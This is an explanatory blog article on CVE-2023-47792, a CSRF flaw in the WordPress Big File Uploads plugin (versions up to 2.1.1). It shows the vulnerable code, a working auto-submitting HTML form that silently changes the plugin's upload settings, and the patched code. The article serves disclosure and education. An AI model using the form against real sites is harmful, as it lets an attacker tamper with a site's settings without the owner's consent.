CVE-2023-47792 - How a CSRF Flaw in Big File Uploads Plugin Could Let Attackers Change Your WordPress Settings

If you use WordPress to run your website, you probably know how hard it can be to upload large files. That’s where plugins like Big File Uploads – Increase Maximum File Upload Size come in handy. But did you know that versions <= 2.1.1 of this plugin had a serious security hole? In this article, we'll break down CVE-2023-47792, a simple but dangerous Cross-Site Request Forgery (CSRF) vulnerability, showing how it works, how it could be exploited, and what you should do.

What is CVE-2023-47792?

CVE-2023-47792 is a CSRF vulnerability in versions up to and including 2.1.1 of Big File Uploads. This means an attacker could trick an authenticated user (like a site admin) into changing the plugin’s settings, without their permission, just by visiting a malicious web page.

Severity: Medium-High
Affected Plugin: Big File Uploads – Increase Maximum File Upload Size
Affected Versions: <= 2.1.1

Official References

- CVE Details (CVE-2023-47792)
- Patchstack Advisory
- Plugin Changelog

How Does This CSRF Vulnerability Work?

In simple terms, CSRF lets attackers perform actions on behalf of a logged-in user—often an admin—without the user’s knowledge.

The plugin’s settings page lets administrators change how big uploaded files can be and where those files are stored. The vulnerable versions didn’t have proper CSRF checks, so they didn’t verify that the request was actually coming from the admin. This let attackers craft a form or a POST request that does anything the admin could do—even if they never visited the settings page.

Technical Details

Normally, when you change settings in WordPress, there’s a special hidden nonce field in the form. This is like a password that proves you were really on the site. In Big File Uploads <= 2.1.1, that field was missing or not checked right.

Vulnerable Code Example (simplified)

// Called when settings form is submitted
if(isset($_POST['big_file_uploads_settings'])) {
    // No CSRF (nonce) verification here!
    update_option('big_file_uploads_settings', $_POST['big_file_uploads_settings']);
}

This means any POST request to this endpoint will change the settings—even if it comes from outside WordPress.

Exploiting CVE-2023-47792: Step by Step

Let’s see how an attacker could exploit this. Imagine the site admin was logged into their site, but also got tricked into opening a malicious page (maybe via a phishing link or a bad ad).

The attacker creates a simple HTML file like this

<form action="https://vulnerable-wordpress.com/wp-admin/options-general.php?page=big-file-uploads"; method="POST" id="csrf-form">
    <input type="hidden" name="big_file_uploads_settings[max_file_size]" value="9999">
    <input type="hidden" name="big_file_uploads_settings[destination_dir]" value="hackeddir">
    <input type="hidden" name="submit" value="Save Changes">
</form>
<script>
document.getElementById('csrf-form').submit();
</script>

The plugin, without checking for the special nonce, will trust the request.

- Suddenly, the max file size is 9999MB, and the directory for uploads is hackeddir—or whatever the attacker wants.

How Was It Fixed?

Starting from version 2.1.2, the developers added nonce checks to ensure that only real admins using the UI could save settings.

Here’s a “fixed” code snippet

if(isset($_POST['big_file_uploads_settings']) 
   && check_admin_referer('big_file_uploads_settings_save', 'big_file_uploads_settings_nonce')) {

    update_option('big_file_uploads_settings', $_POST['big_file_uploads_settings']);
}

Now, if the nonce field isn’t present or valid, the request is ignored—even if it comes from a logged-in user.

Conclusion

CSRF bugs are sneaky because they abuse your trust in your own WordPress dashboard. In this case, a missing nonce check could have let hackers change how your site handles file uploads—without you even knowing.

If you use Big File Uploads, get patched up, keep an eye on plugin updates, and always be careful what links you click on when logged in as admin.

Further Reading

- OWASP: Cross Site Request Forgery
- Big File Uploads WordPress Plugin
- Patchstack Vulnerability Bulletin


*Written by a WordPress security enthusiast, just for you.*

Timeline

Published on: 11/22/2023 19:15:00 UTC
Last modified on: 11/29/2023 02:29:00 UTC